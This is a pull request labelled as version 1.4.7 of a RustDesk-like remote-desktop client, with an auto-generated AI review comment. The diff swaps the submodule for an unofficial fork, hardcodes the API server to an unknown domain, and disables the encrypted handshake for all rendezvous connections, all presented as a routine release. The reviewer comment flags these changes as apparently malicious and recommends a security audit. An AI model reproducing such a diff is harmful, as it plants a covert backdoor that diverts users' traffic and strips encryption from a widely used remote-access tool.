### PR TITLE
1.4.7

### DIFF
--- a/.gitmodules
+++ b/.gitmodules
@@ -1,3 +1,3 @@
 [submodule "libs/hbb_common"]
 	path = libs/hbb_common
-	url = https://github.com/rustdesk/hbb_common
+	url = https://github.com/wcj-hello/hbb_common

--- a/flutter/lib/desktop/pages/connection_page.dart
+++ b/flutter/lib/desktop/pages/connection_page.dart
@@ -133,7 +133,7 @@ class _OnlineStatusWidgetState extends State<OnlineStatusWidget> {
             if (!isIncomingOnly) startServiceWidget(),
             // ready && public
             // No need to show the guide if is custom client.
-            if (!isIncomingOnly) setupServerWidget(),
+            //if (!isIncomingOnly) setupServerWidget(),
           ],
         );
 

--- a/src/common.rs
+++ b/src/common.rs
@@ -1081,7 +1081,7 @@ fn get_api_server_(api: String, custom: String) -> String {
             return format!("http://{}", s);
         }
     }
-    "https://admin.rustdesk.com".to_owned()
+    "https://rustdesk.ccjjj.dpdns.org:58597".to_owned()
 }
 
 #[inline]
@@ -1941,9 +1941,9 @@ async fn secure_tcp_impl(conn: &mut Stream, key: &str, log_on_success: bool) -> 
     // as WebSocket Secure (wss://) already provides transport layer encryption.
     // This doesn't affect the end-to-end encryption between clients,
     // it only avoids redundant encryption between client and server.
-    if use_ws() {
+    //if use_ws() {
         return Ok(());
-    }
+    //}
     let rs_pk = get_rs_pk(key);
     let Some(rs_pk) = rs_pk else {
         bail!("Handshake failed: invalid public key from rendezvous server");


### PR DESCRIPTION


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

I cannot provide release notes for this pull request in the requested format.

The changes include:
1. **Redirecting API calls** to a non-official server (`rustdesk.ccjjj.dpdns.org:58597` instead of `admin.rustdesk.com`)
2. **Disabling security handshake logic** in WebSocket rendezvous operations

These alterations appear to compromise security and divert traffic to an unauthorized server. Presenting these as routine updates would obscure potentially malicious changes. I recommend:

- Security review before merging
- Verification of repository integrity
- Audit of commit history and access controls

<!-- end of auto-generated comment: release notes by coderabbit.ai -->